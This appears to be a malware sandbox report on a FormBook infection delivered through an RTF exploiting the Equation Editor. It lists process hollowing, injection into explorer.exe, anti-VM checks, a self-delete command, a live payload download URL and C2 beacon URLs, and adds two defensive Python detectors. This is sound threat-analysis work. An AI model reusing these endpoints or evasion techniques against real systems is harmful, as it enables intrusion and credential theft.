            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: vbc.exe, 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000000C9B7E second address: 00000000000C9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1528Thread sleep time: -180000s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2576Thread sleep time: -37574s >= -30000s
            Source: C:\Users\Public\vbc.exe TID: 2588Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2080Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exe TID: 2028Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 37574
            Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000005.00000000.457933367.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.431669651.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
            Source: explorer.exe, 00000005.00000000.456077913.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
            Source: explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000005.00000000.433667543.0000000008418000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000g
            Source: vbc.exe, 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00409AB0 rdtsc
            Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A526F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB00EA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01EB0080 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ED26F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040ACF0 LdrLoadDll,
            Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard
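
The RDTSC pair and the probe strings above are the kind of indicators worth scanning for in memory dumps of related samples. The following is an added example, not code from the sandbox or from the sample: it looks for the intercepted instruction sequence (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc, in both common encodings) and, in ASCII and in UTF-16LE (vbc.exe is a .NET binary, so its strings may sit in memory either way), the sandbox/VM strings reported for vbc.exe. The function names, the constructed dump bytes and the load address are assumptions made for the example.

```python
"""Scan a memory dump for the anti-analysis indicators listed in this report.

Added example; not code from the sandbox or from the sample. The dump at the
bottom is constructed and contains no bytes from the sample.
"""
import re
from typing import Dict, List

# The intercepted sequence, accepting both common encodings of the xor and
# add instructions. The second rdtsc lands 6 bytes after the first, which is
# the 0x409904 -> 0x40990A spacing the report shows.
RDTSC_PAIR = re.compile(
    rb"\x0f\x31(?:\x33\xc9|\x31\xc9)(?:\x03\xc8|\x01\xc1)\x0f\x31"
)

# Probe strings the report found in vbc.exe memory.
PROBE_STRINGS = [
    "SBIEDLL.DLL",               # Sandboxie user-mode hook DLL
    "wine_get_unix_file_name",   # kernel32 export that exists only under Wine
    "VMware SVGA II",            # VMware display adapter name
    "VMware Tools",
    "VEN_VMWARE",                # VMware virtual disk PnP id
]

# One case-insensitive pattern per string and encoding (ASCII and UTF-16LE).
_STRING_PATTERNS = [
    (s, re.compile(re.escape(s.encode(enc)), re.IGNORECASE))
    for s in PROBE_STRINGS
    for enc in ("ascii", "utf-16-le")
]


def scan_dump(data: bytes, base: int = 0) -> Dict[str, List[int]]:
    """Return {indicator: [addresses]} for every hit; base is the dump's load address."""
    hits: Dict[str, List[int]] = {}
    for m in RDTSC_PAIR.finditer(data):
        hits.setdefault("rdtsc_pair", []).append(base + m.start())
    for name, pat in _STRING_PATTERNS:
        for m in pat.finditer(data):
            hits.setdefault(name, []).append(base + m.start())
    return hits


def verdict(hits: Dict[str, List[int]]) -> str:
    """VM device strings on their own are weak evidence: explorer.exe carries
    VMware device ids on any VMware guest, as this report shows. A timing
    check plus a sandbox probe string in the same image is a much stronger
    signal."""
    timing = "rdtsc_pair" in hits
    probes = [k for k in hits if k != "rdtsc_pair"]
    if timing and probes:
        return "anti-analysis"
    if timing or probes:
        return "suspicious"
    return "clean"


# Constructed dump: NOP padding, the intercepted instruction sequence, one
# ASCII probe string and one UTF-16LE probe string.
SAMPLE_DUMP = (
    b"\x90" * 16
    + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"
    + b"\x90" * 8
    + b"SbieDll.dll\x00"
    + "VMware SVGA II".encode("utf-16-le")
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP, base=0x400000)
    for name, addrs in found.items():
        print(name, [hex(a) for a in addrs])
    print(verdict(found))
```

Run against a real dump, pass the region's base address so the reported offsets line up with the addresses in the report; the verdict deliberately separates a lone VMware string (normal on a VMware guest) from a timing check combined with a sandbox probe.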

            HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.mountfrenchlodge.net
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 480000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 1764
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
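
The process chain in this section (EQNEDT32.EXE writing vbc.exe to C:\Users\Public and launching it, vbc.exe re-launching itself and hollowing raserver.exe, raserver.exe removing the dropper with cmd.exe /c del) maps onto a handful of host-level detections. The following is an added example, not the sandbox's or the sample's code: it runs those rules over constructed Sysmon-style events that mirror the chain. The rule names, the PIDs and the event records are invented for the example; only the image paths and the command lines come from this report.

```python
"""Detection rules for the execution chain in this report, run over
constructed Sysmon-style events.

Added example; not the sandbox's or the sample's code. Field names follow
Sysmon (EventID 1 = process create, 11 = file create; Image, ParentImage,
CommandLine, TargetFilename). PIDs 200-700 are invented.
"""
import re
from typing import Dict, List, Tuple

EQUATION_EDITOR = "eqnedt32.exe"   # Equation Editor has no reason to spawn anything
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", EQUATION_EDITOR}
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\temporary internet files\\")
DEL_RE = re.compile(r"\bdel\b\s+\"?([^\"]+?\.exe)\"?", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[dict]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs; events must be in chronological order."""
    alerts: List[Tuple[str, str]] = []
    image_of: Dict[int, str] = {}
    parent_of: Dict[int, int] = {}
    dropped_pes: set = set()

    for ev in events:
        if ev["EventID"] == 11:
            target = ev["TargetFilename"]
            if _basename(ev["Image"]) in OFFICE_IMAGES and target.lower().endswith(".exe"):
                dropped_pes.add(target.lower())
                alerts.append(("office_drops_pe", f"{_basename(ev['Image'])} wrote {target}"))
            continue
        if ev["EventID"] != 1:
            continue

        image, parent = ev["Image"], ev["ParentImage"]
        pid, ppid = ev["ProcessId"], ev["ParentProcessId"]
        image_of[pid], parent_of[pid] = image, ppid
        lowered = image.lower()

        if _basename(parent) == EQUATION_EDITOR:
            alerts.append(("eqnedt32_child_process", f"{parent} -> {image}"))
        if any(d in lowered for d in SUSPICIOUS_DIRS):
            alerts.append(("exec_from_suspicious_dir", image))
        if lowered in dropped_pes:
            alerts.append(("dropped_pe_executed", image))

        # Self-deletion: cmd.exe deleting the image of one of its own ancestors,
        # the way raserver.exe removed vbc.exe in this report.
        if _basename(image) == "cmd.exe":
            m = DEL_RE.search(ev["CommandLine"])
            if m:
                victim = m.group(1).lower()
                ancestors, p = [], ppid
                while p in image_of:
                    ancestors.append(image_of[p].lower())
                    p = parent_of[p]
                if victim in ancestors:
                    alerts.append(("self_delete_via_cmd", f"{image} deletes ancestor {victim}"))
    return alerts


EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
VBC = r"C:\Users\Public\vbc.exe"
RASERVER = r"C:\Windows\SysWOW64\raserver.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"

# Constructed events mirroring the chain in this report.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": EQNEDT32, "TargetFilename": VBC},
    {"EventID": 1, "ProcessId": 300, "ParentProcessId": 200, "Image": VBC,
     "ParentImage": EQNEDT32, "CommandLine": f'"{VBC}"'},
    {"EventID": 1, "ProcessId": 400, "ParentProcessId": 300, "Image": VBC,
     "ParentImage": VBC, "CommandLine": VBC},
    {"EventID": 1, "ProcessId": 600, "ParentProcessId": 400, "Image": RASERVER,
     "ParentImage": VBC, "CommandLine": RASERVER},
    {"EventID": 1, "ProcessId": 700, "ParentProcessId": 600, "Image": CMD,
     "ParentImage": RASERVER, "CommandLine": f'{CMD} /c del "{VBC}"'},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:26} {detail}")
```

The self-deletion rule is the one that needs state: it only fires when the path handed to del is the image of a process in the cmd.exe ancestor chain, which separates this pattern from ordinary cleanup scripts.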

            Stealing of Sensitive Information:

Yara detected FormBook
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

Yara detected FormBook
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

Numbers in parentheses are the signature-count superscripts the report attaches to techniques it observed for this sample; entries without a number are empty cells of the matrix template.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules (1); Exploitation for Client Execution (13); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Rootkit (1); Masquerading (111); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (13)
Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (113); Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (14); Non-Application Layer Protocol (3); Application Layer Protocol (123); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 528701; Sample: 3nkW4MtwSD; Start date: 25/11/2021; Architecture: WINDOWS; Score: 100

Process tree recovered from the graph (signatures, dropped files and network nodes are listed under the process they hang off):

Root signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures
Root DNS/IP nodes: www.troddu.com; troddu.com

WINWORD.EXE (node counts as labelled: 291, 19)
  dropped: ~WRF{85338F29-7DEE...4-3AA1C7FBE740}.tmp, Composite

EQNEDT32.EXE (node count as labelled: 12)
  network: 198.46.199.153, 49165, 80, AS-COLOCROSSINGUS, United States
  dropped: C:\Users\user\AppData\Local\...\vbc[1].exe, PE32
  dropped: C:\Users\Public\vbc.exe, PE32
  signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  started vbc.exe
    signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    started vbc.exe
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      started raserver.exe
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        started cmd.exe
      injected explorer.exe
        DNS: www.mountfrenchlodge.net; www.cuteprofessionalscrubs.com; 2 other IPs or domains
        signature: System process connects to network (likely due to code injection or exploit)


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
3nkW4MtwSD.rtf | 56% | Virustotal |
3nkW4MtwSD.rtf | 100% | Avira | HEUR/Rtf.Malformed

            Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp | 100% | Joe Sandbox ML |

            Unpacked PE Files

Source | Detection | Scanner | Label
4.0.vbc.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.0.vbc.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.0.vbc.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

Source | Detection | Scanner | Label
cuteprofessionalscrubs.com | 4% | Virustotal |
troddu.com | 0% | Virustotal |

            URLs

Source | Detection | Scanner | Label
www.cuteprofessionalscrubs.com/9gr5/ | 0% | Avira URL Cloud | safe
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://198.46.199.153/70007/vbc.exe | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 | 0% | Avira URL Cloud | safe
http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Note that the reputation services rate the payload download URL (http://198.46.199.153/70007/vbc.exe) and both /9gr5/ beacon URLs as safe at analysis time; the malicious verdicts in the Contacted URLs section below rest on the observed behaviour (the download by EQNEDT32.EXE and the beaconing from the injected explorer.exe), not on these labels.

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cuteprofessionalscrubs.com | 34.102.136.180 | true | false | | unknown
mountfrenchlodge.net | 34.102.136.180 | true | false | | unknown
troddu.com | 162.240.31.112 | true | true | | unknown
www.troddu.com | unknown | unknown | true | | unknown
www.cuteprofessionalscrubs.com | unknown | unknown | true | | unknown
www.mountfrenchlodge.net | unknown | unknown | true | | unknown

                    Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.cuteprofessionalscrubs.com/9gr5/ | true | Avira URL Cloud: safe | low
http://198.46.199.153/70007/vbc.exe | true | Avira URL Cloud: safe | unknown
http://www.mountfrenchlodge.net/9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 | false | Avira URL Cloud: safe | unknown
http://www.cuteprofessionalscrubs.com/9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 | false | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://www.msn.com/?ocid=iehpg | explorer.exe, 00000005.00000000.421025770.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.438992148.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.457833157.000000000449C000.00000004.00000001.sdmp | false | - | high
http://investor.msn.com | explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.423050629.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | false | - | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000005.00000000.421288700.00000000045D6000.00000004.00000001.sdmp | false | - | high
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1-220 | explorer.exe, 00000005.00000000.421059058.00000000044E7000.00000004.00000001.sdmp | false | - | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp | false | - | high
http://treyresearch.net | explorer.exe, 00000005.00000000.421368152.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000005.00000000.441652368.0000000008374000.00000004.00000001.sdmp | false | - | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000003.00000002.417839615.0000000006BE7000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.419756160.0000000002CC7000.00000002.00020000.sdmp | false | - | high
http://java.sun.com | explorer.exe, 00000005.00000000.424665846.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.456041040.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
